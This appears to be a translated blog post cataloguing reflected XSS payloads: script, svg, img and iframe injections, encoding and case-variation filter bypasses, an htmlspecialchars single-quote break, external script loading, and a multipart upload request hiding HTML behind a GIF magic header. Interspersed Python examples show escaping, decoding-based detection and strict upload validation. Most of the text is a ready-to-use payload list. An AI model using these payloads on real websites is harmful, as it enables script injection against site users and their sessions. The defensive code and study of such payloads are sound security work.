Common reflected XSS attack methods

臭大佬 2021-08-19 17:28:51
linux
Summary: common reflected XSS attack methods

Plain XSS JavaScript injection

Closing the input tag from an input field
c"/><script>alert(1)</script>
Text box input
Basic test
<script>alert(1)</script>
Case variation
<sCRipT>alert(1)</sCrIPt>
svg tag
<svg/onload=alert(1)>
svg file

Create a file named 11.svg for upload, with the following contents:

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

or

<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>

The full 11.svg file is an ordinary icon SVG with the same onload attribute added to its root <svg> element:

Redirect
<script> window.location="http://www.baidu.com"</script>
<iframe src='http://127.0.0.1/a.jpg' height='0' width='0'></iframe>
<script src='http://127.0.0.1/a.js'></script>
htmlspecialchars bypass

// Even when htmlspecialchars() is applied, is the output safe? By default htmlspecialchars does not escape the single quote ('), so when the processed input is written into the value attribute of an input tag, try: ' onclick='alert(1)'

' onclick='alert(1)'
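To see why the default flags matter, here is an added example (not code from the original post) that mimics PHP's htmlspecialchars() with and without ENT_QUOTES in Python and uses the standard-library HTML parser to show which attributes a browser would see on the resulting input tag; escape_compat, escape_quotes, render_input and attribute_names are names chosen for this demo.

```python
from html.parser import HTMLParser

# Added example, not code from the original post. Two escapers that mimic
# PHP htmlspecialchars(): the default flags (ENT_COMPAT) leave the single
# quote alone, ENT_QUOTES escapes it as well.
def escape_compat(s: str) -> str:
    """htmlspecialchars() default: escapes & < > and the double quote only."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))

def escape_quotes(s: str) -> str:
    """htmlspecialchars($s, ENT_QUOTES): also escapes the single quote."""
    return escape_compat(s).replace("'", "&#039;")

def render_input(value: str, escaper) -> str:
    """Server-side template that puts user input into a single-quoted value attribute."""
    return "<input type='text' value='" + escaper(value) + "'>"

class _AttrCollector(HTMLParser):
    """Collects the attribute names a browser would see on each start tag."""
    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name for name, _ in attrs)

def attribute_names(markup: str) -> list:
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.names

# The probe string from the section above (constructed input for the demo).
PROBE = "' onclick='alert(1)'"

if __name__ == "__main__":
    for escaper in (escape_compat, escape_quotes):
        markup = render_input(PROBE, escaper)
        # With escape_compat the browser sees an extra onclick attribute;
        # with escape_quotes it sees only type and value.
        print(escaper.__name__, attribute_names(markup), markup)
```

The same break does not occur if the template uses double-quoted attributes, since the default flags do escape the double quote; escaping both quote characters removes the dependency on which quote the template happens to use.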
Character encoding
<script>alert("xss");</script>
can be converted to:

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e
// using eval
<script>eval("\61\6c\65......");</script>
Space / newline / Tab
<img src= "javascript: alert(/1/);" width=100>
Executing XSS through HTML tag attribute values
<img src = "javascript:alert('1');">
Event handlers
<img src=1 onerror=alert(1);>

<input type = "button"  value = "clickme" onclick="alert('click me')" />
Browser request parameters (the parameter name must exist and the request method must be the same)

xxx?method=<img src=1 onerror=alert(1);>

?name=<img%20src%3D1%20onerror%3Dalert%281%29%3B>
 =%22;alert%281%29;%2f%2f

?name=<meta charset="ISO-2022-JP"><img src="#" onerror%1B28B=alert(1) />

x=payload1"><svg><script>alert%26%23x28;1%26%23x29</script></svg>
IMG tag XSS with a JavaScript command
<IMG SRC=http://xxx/XSS/xss.js/>
IMG tag without semicolons or quotes
<IMG SRC=javascript:alert(1)>
IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert(1)>
HTML encoding (semicolons required)
<IMG SRC=javascript:alert(1)>
Malformed IMG tag
<IMG """><SCRIPT>alert(1)</SCRIPT>">
String.fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
Embedded tab, splitting the word JavaScript
<IMG SRC="jav ascript:alert(1);">
Embedded encoded tab, splitting the word JavaScript
<IMG SRC="jav ascript:alert(1);">
Embedded newline
<IMG SRC="jav ascript:alert(1);">
Embedded carriage return
<IMG SRC="jav ascript:alert(1);">
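As an added example (not from the original post), the following Python normalizer undoes the percent-encoding, the numeric entities without semicolons and the embedded tab/newline/CR tricks from the encoding sections above before a simple detection regex runs; it generalizes beyond the single payloads shown, and normalize, looks_like_xss and the sample strings are constructed for this demo.

```python
import html
import re
from urllib.parse import unquote

# Added example, not code from the original post: undo the encoding layers the
# payloads above rely on before matching, so that %3c, &#x6A (no semicolon
# needed) and a tab inside "jav\tascript:" all collapse to the plain form.

# Tab, newline and carriage return are ignored by browsers inside a URL scheme,
# which is what the "embedded tab/newline/carriage return" IMG payloads exploit.
_SCHEME_JUNK = re.compile(r"[\t\n\r]")

def normalize(value: str, max_rounds: int = 3) -> str:
    """Percent-decode and entity-decode repeatedly until the string stops changing."""
    out, prev = value, None
    for _ in range(max_rounds):
        if out == prev:
            break
        prev = out
        out = unquote(out)        # %3c%73 -> <s ; %25-double encoding falls on the next round
        out = html.unescape(out)  # &#x6A&#x61 -> ja ; a missing ';' is accepted, as in browsers
    return out

_RISKY = re.compile(
    r"<\s*(script|svg|iframe|img|meta)\b"   # tag-based payloads from the sections above
    r"|\bon[a-z]+\s*="                      # inline event handlers (onerror=, onclick=, onload=)
    r"|javascript\s*:",                     # javascript: URLs, after scheme junk is stripped
    re.I,
)

def looks_like_xss(value: str) -> bool:
    """Detection only: flags a request parameter for logging or blocking.

    Output encoding at the point of rendering remains the actual fix; this
    catches the encoded variants a naive substring filter would miss.
    """
    return bool(_RISKY.search(_SCHEME_JUNK.sub("", normalize(value))))

if __name__ == "__main__":
    # Constructed samples taken from the payload shapes shown above.
    for sample in (
        "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b",
        '<IMG SRC="jav\tascript:alert(1);">',
        "<img%20src%3D1%20onerror%3Dalert%281%29%3B>",
        "plain search text",
    ):
        print(looks_like_xss(sample), repr(normalize(sample)))
```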
Double open brackets
<<SCRIPT>alert(1);//<</SCRIPT>
Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert(1)"
Double open angle brackets
<iframe src=http://3w.org/XSS.html <
No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
Escaping JavaScript escapes
\";alert(1);//
Closing the TITLE tag
</TITLE><SCRIPT>alert(1);</SCRIPT>
Omitting [http:]
<A HREF="//www.google.com/">1</A>
Omitting [www]
<A HREF="http://google.com/">1</A>
Absolute dot, absolute DNS
<A HREF="http://www.google.com./">1</A>
javascript link
<A HREF="javascript:document.location='http://www.google.com/'">1</A>

Upload bypass

Web applications usually inspect the header of the uploaded file and use it to decide whether the file is legitimate. Upload filter functions generally check only the first four bytes of the header. For example, these are the bytes checked for the following image formats:

JPEG - FF D8 FF DB - ÿØÿÛ
GIF  - 47 49 46 38 - GIF8
PNG  - 89 50 4E 47 - ‰PNG

Exploiting this takes only two steps:

Use a wrong file extension when uploading the file, to confuse the browser;
Prepend the magic header text: GIF8

Send the request:

---------------------------- -6683303835495
Content-Disposition: form-data; name= "upload"; filename= "badfile.''gif"
Content-Type: image/png

GIF8
<html><script>alert(1)</script></html>
---------------------------- -6683303835495--
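The following is an added example (not the post's own code) that contrasts the first-four-bytes check described above with a stricter check tying extension, Content-Type, full format signature and format trailer together; weak_check, strict_check and the sample bytes are constructed for the demo.

```python
# Added example, not code from the original post: the four-byte "magic"
# check described above, next to a stricter check that requires the full
# format signature, the file extension, the declared Content-Type and the
# format trailer to agree. Sample files below are constructed for the demo.

SIGNATURES = {            # full signatures, not just the first four bytes
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
TRAILERS = {              # every well-formed file of the format ends with this
    "gif": b";",
    "png": b"IEND\xae\x42\x60\x82",
    "jpg": b"\xff\xd9",
}
CONTENT_TYPES = {"gif": "image/gif", "png": "image/png", "jpg": "image/jpeg"}
FOUR_BYTE_MAGIC = (b"GIF8", b"\x89PNG", b"\xff\xd8\xff\xdb")

def weak_check(data: bytes) -> bool:
    """Header-only filter like the one the post describes: first four bytes only."""
    return data[:4] in FOUR_BYTE_MAGIC

def strict_check(filename: str, content_type: str, data: bytes) -> tuple:
    """Returns (accepted, reason); every field must agree with the others."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ext = {"jpeg": "jpg"}.get(ext, ext)
    if ext not in SIGNATURES:
        return False, "extension not allowed: %r" % ext
    if content_type.split(";")[0].strip().lower() != CONTENT_TYPES[ext]:
        return False, "Content-Type %r does not match .%s" % (content_type, ext)
    if not data.startswith(SIGNATURES[ext]):
        return False, "full signature mismatch"
    if not data.endswith(TRAILERS[ext]):
        return False, "file does not end with the %s trailer" % ext
    return True, "ok"

# Constructed samples: the polyglot from the request above, and a 1x1 GIF skeleton.
POLYGLOT = b"GIF8\n<html><script>alert(1)</script></html>"
TINY_GIF = b"GIF89a\x01\x00\x01\x00\x00\x00\x00;"

if __name__ == "__main__":
    print("weak check passes polyglot:", weak_check(POLYGLOT))
    print(strict_check("badfile.''gif", "image/png", POLYGLOT))
    print(strict_check("badfile.gif", "image/gif", POLYGLOT))
    print(strict_check("pixel.gif", "image/gif", TINY_GIF))
```

Re-encoding the upload with an image library and serving uploads from a separate origin with a fixed Content-Type close the remaining gap, since a real GIF can still carry HTML in its body.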

References:
吕滔博客 (Lü Tao's blog) https://lvtao.net/dev/xss.html